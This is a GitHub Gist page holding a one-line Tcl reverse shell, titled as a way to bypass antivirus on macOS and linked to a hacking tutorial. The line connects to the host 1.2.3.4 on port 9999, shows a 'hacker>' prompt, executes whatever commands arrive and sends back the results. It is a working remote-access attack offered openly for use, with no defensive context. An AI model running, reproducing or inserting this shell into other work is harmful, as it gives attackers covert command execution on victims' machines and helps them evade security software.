Skip to content

Instantly share code, notes, and snippets.

@gmh5225
Forked from tokyoneon/reverse_shell.tcl
Created December 20, 2025 04:10
Show Gist options
  • Select an option

  • Save gmh5225/c9f5322a1718aac54be9c0e02d8303f4 to your computer and use it in GitHub Desktop.

Select an option

Save gmh5225/c9f5322a1718aac54be9c0e02d8303f4 to your computer and use it in GitHub Desktop.
Use One Tclsh Command to Bypass Antivirus #macOS
# https://null-byte.wonderhowto.com/how-to/hacking-macos-use-one-tclsh-command-bypass-antivirus-protections-0186330/
set s [socket 1.2.3.4 9999];while 42 { puts -nonewline $s "hacker> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment